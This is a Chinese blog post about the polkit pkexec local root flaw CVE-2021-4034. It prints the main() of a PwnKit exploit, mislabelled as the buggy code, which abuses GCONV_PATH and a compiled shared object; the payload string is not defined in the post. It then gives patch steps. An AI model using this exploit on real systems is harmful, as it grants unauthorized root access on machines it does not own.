自我提升指南(一) 阿里云pkexec 中的本地提权漏洞 (CVE-2021-4034)

自我提升指南(一) 阿里云pkexec 中的本地权限提升漏洞 (CVE-2021-4034)

我一登进阿里云,就发现事情不太对


一、pkexec ?

polkit 的 pkexec 实用程序中存在一个本地权限提升漏洞。当前版本的 pkexec 无法正确处理调用参数计数,并最终尝试将环境变量作为命令执行。攻击者可以通过控制环境变量来利用这一点,从而诱导 pkexec 执行任意代码。利用成功后,会导致本地特权升级,非特权用户获得管理员权限。

二、漏洞危害

影响范围
自2009年以来的所有 Polkit 版本(存在于所有主流的 Linux 发行版中)。

1.错误代码

int main(int argc, char *argv[]) {
	FILE *fp;
	system("mkdir -p 'GCONV_PATH=.'; touch 'GCONV_PATH=./pwnkit'; chmod a+x 'GCONV_PATH=./pwnkit'");
	system("mkdir -p pwnkit; echo 'module UTF-8// PWNKIT// pwnkit 2' > pwnkit/gconv-modules");
	fp = fopen("pwnkit/pwnkit.c", "w");
	fprintf(fp, "%s", shell);
	fclose(fp);
	system("gcc pwnkit/pwnkit.c -o pwnkit/pwnkit.so -shared -fPIC");
	char *env[] = { "pwnkit", "PATH=GCONV_PATH=.", "CHARSET=PWNKIT", "SHELL=pwnkit", NULL };
	execve("/usr/bin/pkexec", (char*[]){NULL}, env);
}

2.修补漏洞

  1. 更新到最新的polkit版本
centos:yum -y install polkit
ubuntu:apt-get install policykit-1
  1. 将pkexec的suid权限取消
chmod 0755 /usr/bin/pkexec 

结果

需要将 rwsr 权限置为 rwxr 权限
在这里插入图片描述


总结

Polkit本地权限提升漏洞(CVE-2021-4034)的漏洞出现的比较突然,没办法预料,那么就需要我们时常关注业内新闻,经常管理查看自己的服务器,以防止他人恶意的攻击或其他方式影响服务器与网站的正常工作。

希望这个博客能对你有所益处。我是轻王,我为自己代言。
  • 9
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 5
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

猫轻王

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值